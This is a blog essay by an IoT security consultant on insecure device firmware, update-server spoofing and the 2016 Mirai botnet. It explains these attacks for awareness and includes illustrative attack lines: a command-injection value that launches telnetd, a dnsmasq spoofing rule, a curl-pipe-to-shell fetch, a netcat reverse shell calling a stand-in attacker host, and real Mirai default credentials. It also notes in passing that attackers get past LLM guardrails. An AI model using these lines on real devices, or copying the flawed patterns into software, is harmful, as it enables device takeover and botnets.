Connected Everything, Secured Nothing
In October 2016, the Mirai botnet took down Dyn, and with it, half the internet. Twitter, Netflix, Reddit, GitHub - all offline because someone figured out that IoT devices ship with default credentials and no one changes them.
I'd been warning about this since 2013, by which point I'd already spent over a decade working on serious infrastructure.
IoT firmware — the software running on these devices — was shockingly poorly written: provisioning that relied on unsanitised variables executed as root via bash scripts, unnecessary ports left wide open, no OTA update mechanism, baked-in credentials (or ones easily guessed if you knew what to look for and how they were generated), debug interfaces left enabled, telnet exposed to the internet, and firmware a child could dump and rip apart.
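That first item deserves a concrete sketch. Here's a hypothetical reconstruction of the sort of provisioning script I kept finding; the endpoint and the DEVICE_ID variable are made up, but the shape is real:

```sh
#!/bin/sh
# Hypothetical reconstruction, running as root during provisioning.
# NAME comes back from the vendor's server completely unsanitised.
NAME=$(curl -s "http://provision.domain.com/name?id=$DEVICE_ID")
# If the server (or anyone impersonating it) returns something like
#   myhost; telnetd -l /bin/sh
# the appended command runs as root on the device.
eval "hostname $NAME"
```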
Don't worry if that didn't make sense — let me explain one of the easiest ones to exploit.
What I Said and What I Was Seeing
One of the easiest routes didn't even require touching the device. By their connected nature, most communication with these devices was pull-based — the device called "home" to the manufacturer's servers over the internet. The problem? They often didn't bother to check that the server they were calling home to was actually their company's server. They'd call out to something like https://update.domain.com — note the 's' after the 'http'; it's ubiquitous now. The Snowden revelations had just landed in 2013, the world was waking up to surveillance, and yet these devices weren't even checking who they were talking to.
The devices didn't always verify the certificate — if the vendor had even enabled TLS in the first place. Yes, that's right: some endpoints weren't even running TLS by default. Your device was talking over the internet with no security at all. So if I could sit at the DNS level — on a compromised router, or by sticking a cable between the device and the internet — I could pretend to be the update server.
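What does sitting at the DNS level actually look like? On a compromised home router running dnsmasq, a single config line is enough to impersonate the update server. This is illustrative, with 192.0.2.10 standing in for a machine the attacker controls:

```sh
# /etc/dnsmasq.conf on a compromised router (illustrative):
# answer every lookup of the vendor's update host with my IP.
address=/update.domain.com/192.0.2.10
```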
For the non-technical: the way firmware usually achieved this was a flag called curl -k, or curl --insecure, baked into the scripts running on those tiny "smart" devices sitting in your home. It tells the device to skip TLS certificate verification entirely: "connect to anything that claims to be the server, even if you can't verify it." It's the digital equivalent of handing your house keys to anyone who turns up at your door in a delivery uniform, except this driver is invisible and you never see them enter your house.
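Put together, the vulnerable call I kept finding in shipped firmware looked something like this, and the fix was always one flag away. A hypothetical reconstruction, not any one vendor's code:

```sh
#!/bin/sh
# The vulnerable pattern: fetch an "update" script from home and run it.
# -k accepts ANY certificate, so whoever answers DNS for
# update.domain.com gets to supply a script that runs as root.
curl -k -s https://update.domain.com/latest.sh | sh

# What it should have been: verify the server against a CA bundle
# shipped in the firmware (a flag curl has had since long before 2013).
curl --cacert /etc/ssl/vendor-ca.pem -s https://update.domain.com/latest.sh | sh
```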
Now imagine you're the vendor. You have thousands of these devices deployed. It would be game over if you somehow pushed out a config that caused them to fail or misbehave — you needed a way to recover, because sending out engineers just wouldn't be possible, and asking clients to debug a device would kill your brand overnight.
So some vendors built an API endpoint that returned a script for the device to run (mostly for diagnostics), or that allowed arbitrary commands to be executed, or even just a simple call that pulled CPU usage.
Here's the fun bit: if I could be that update server, I could push my own scripts down to the device, or append my own inline command to the end of a legitimate response, and the "smart" device would happily execute them — so much for being smart. Game over. I've just pushed a script that opens a remote backdoor calling back to my servers, and that's how you get your own botnet. Now imagine that at scale.
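Concretely, the exchange looks like this: the device asks its diagnostics endpoint for something to run, and the spoofed server sends back the expected output plus one extra line. The attacker host below is hypothetical, and the reverse-shell one-liner is the standard netcat-and-FIFO trick:

```sh
# What the device expects back from the diagnostics endpoint (benign):
uptime
cat /proc/loadavg

# What a spoofed server can append (illustrative): a reverse shell
# calling back to a host the attacker controls, via nc and a named pipe.
mkfifo /tmp/p; nc attacker.example.net 4444 </tmp/p | /bin/sh >/tmp/p 2>&1 &
```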
I was finding this in production firmware in 2013. I'd been finding it in devices back in 2008. Devices that were meant to be secure, with "SSL encryption" (technically TLS, but let's not split hairs) in the marketing materials, happily connecting to any man-in-the-middle who bothered to intercept them.
The title of the talk I was giving wasn't subtle. IoT was rushing toward cloud connectivity without any serious security architecture. The devices were a tinderbox. The clouds they connected to were the matches. The whole thing was waiting for a spark.
This was my job. Finding holes in IoT products before they shipped, or more often, after they'd already shipped. The reaction was usually somewhere between denial and panic, with a brief stop at "can we just not tell anyone?"
Filippo Valsorda is a proper cryptographer. When he tweeted about TLS issues, I chimed in with the IoT angle. The example code that developers copied into their projects was teaching them to disable security by default. The rot started in the tutorials.
This wasn't obscure. Anyone doing IoT security work was seeing the same things. We were all writing the same reports, giving the same talks, being ignored in the same ways.
Why Nobody Listened
Time to market. Security takes time. Adding proper certificate handling, credential management, update mechanisms - all of this slows down shipping. The competitive pressure was to ship first, worry about security never.
No liability. When an IoT device gets compromised and joins a botnet, who pays? Not the manufacturer. Not the retailer. The cost is externalised to everyone who gets DDoS'd. No incentive to fix it.
Invisible until it isn't. Security is intangible. Features sell. "Unhackable" is hard to demonstrate in a trade show booth. "Voice control" is easy.
Developer inexperience. The people building IoT devices were often hardware engineers learning software, or embedded developers who'd never dealt with networked threats. They didn't know what they didn't know.
I was in the room with these people. I wasn't unsympathetic. At one talk there were a good 150 developers in the audience whose job this was, part of a larger crowd from across the industry. I asked them to raise their hands and keep them up as the questions got harder. By the time I asked who understood what --insecure actually did at the end of a curl command, half a dozen hands were left. The pressures they were under were real. But the vulnerabilities they were shipping were also real.
Then Mirai Happened
October 2016. The Mirai botnet, built from compromised IoT devices - cameras, DVRs, routers - launched a DDoS attack against Dyn's DNS infrastructure. Half the internet went dark. At its peak, Mirai had enslaved an estimated 600,000 devices. The attack came in waves, lasting most of the day, and Dyn's engineers were fighting it in real time with no playbook — because nobody had ever seen a botnet this size built entirely from IoT devices.
The devices weren't hacked through sophisticated exploits. Mirai just tried default credentials. It worked on hundreds of thousands of devices because millions shipped with default credentials that no one changed.
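The shape of the attack fits in a few lines of shell. This is an illustrative sketch, not Mirai's actual scanner, though pairs like root/xc3511 and root/vizxv genuinely appear in the leaked source:

```sh
#!/bin/sh
# Illustrative sketch of the approach, not Mirai's real code.
TARGET=192.0.2.50   # hypothetical device with telnet (port 23) open
for cred in root:xc3511 root:vizxv admin:admin support:support root:default; do
  user=${cred%%:*}; pass=${cred##*:}
  # Mirai would attempt a telnet login here; we just print the attempt.
  printf 'trying %s / %s against %s:23\n' "$user" "$pass" "$TARGET"
done
```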
Everything I'd been warning about for three years, demonstrated at scale, in a way that was impossible to ignore.
What Changed (And What Didn't)
After Mirai, IoT security got briefly fashionable. Conferences wanted talks. Journalists wanted quotes. Regulators started making noises.
Some things improved. The UK's PSTI Act finally came into force in April 2024 — over seven years after Mirai — making it illegal to ship devices with default passwords like "admin" or "12345." Every device now needs a unique password or must force a change on first use. It only took an internet-breaking botnet, and seven and a half years, to get there.
But the fundamental incentives haven't changed. Time to market still beats security. Liability is still externalised. The cheapest device still wins on Amazon. The race to the bottom continues, just with slightly better optics.
The next Mirai-scale event is a matter of when, not if. The attack surface keeps growing. The defenders haven't fundamentally changed the game.
And the game has changed again. AI has handed every script kiddie a force multiplier. Anyone who can circumvent an LLM's guardrails can bang out pretty sophisticated malware in an afternoon. The barrier to entry for writing exploits just collapsed. The devices haven't got any smarter, but the attackers have. And there are more devices than ever — every RP2040 in a keyboard, every smart plug, every camera on a shelf in Argos.
The Lesson
Being early on a correct observation doesn't mean you can change the outcome. I was right about IoT security in 2013. Everyone doing security work was right. We were all giving the same warnings.
The warnings didn't prevent Mirai. They didn't prevent the dozens of IoT botnets that came after. They might have influenced the margins - some companies shipped slightly better products because someone in the room had heard a talk once.
But the systemic issues required systemic solutions. Regulation, liability reform, market pressure. None of those materialised in time.
I still think it was worth doing. Documenting the problems publicly, with timestamps, means there's a record.
But I should be honest about my own limitations here too. I was warning about IoT security while still working with companies that shipped products with known compromises because the timeline demanded it. I understood the pressures. I made recommendations that got overruled by commercial reality. Sometimes I didn't push hard enough.
Being right about the problem doesn't mean I solved it. That's worth remembering.
Worried about the security posture of your product or infrastructure? I can help with that.
This article is part of The Long View — spotting signals and patterns before they're obvious.